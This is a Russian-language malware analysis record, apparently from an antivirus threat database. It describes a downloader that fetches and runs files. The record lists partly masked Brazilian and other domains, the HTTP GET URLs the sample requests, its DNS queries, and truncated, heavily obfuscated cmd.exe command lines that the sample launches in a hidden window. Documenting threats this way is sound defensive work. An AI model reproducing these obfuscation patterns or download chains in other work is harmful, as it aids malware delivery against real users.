Техническая информация
Вредоносные функции
Загружает файлы и запускает на исполнение.
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c ^FoR , /f , " tokens= 2 delims=fr=" , %^y , ; ^iN , ; ( , ' , AsS^^Oc , , ^^.cmd ' ; ) , dO , , %^y, ; X6bIWQn/VSUMCe^I#^9iv ; ; s4LDwQHg/r " , ( , (sE^t ^ -@}^]=+\$y5t...
Сетевая активность
Подключается к
- 'kd###ord.com':80
- 'ik##im.com':80
- 'eb####cacia.com.br':80
- 'cr###t.com.br':80
TCP
Запросы HTTP GET
- http://kd###ord.com/SA0FH9a
- http://ik##im.com/logssite/Hhzm1
- http://eb####cacia.com.br/IRSmO
- http://cr###t.com.br/Pw6
UDP
- DNS ASK kd###ord.com
- DNS ASK ik##im.com
- DNS ASK ea###rnh.com.hk
- DNS ASK eb####cacia.com.br
- DNS ASK cr###t.com.br
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ^FoR , /f , " tokens= 2 delims=fr=" , %^y , ; ^iN , ; ( , ' , AsS^^Oc , , ^^.cmd ' ; ) , dO , , %^y, ; X6bIWQn/VSUMCe^I#^9iv ; ; s4LDwQHg/r " , ( , (sE^t ^ -@}^]=+\$y5t...' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c AsS^Oc ^.cmd
- '<SYSTEM32>\cmd.exe' , ; X6bIWQn/VSUMCeI#9iv ; ; s4LDwQHg/r " , ( , (sE^t ^ -@}^]=+\$y5t^A^FpzWdfi^q^'1r^)C^gkOG8H{Ihna/ :;x9cLj,^@SoPl^X=.s}b^wm0^6-^(euNRvD) )& ; ; fOR ; %L , ; ^in , , ( ^ +8 , ^4...
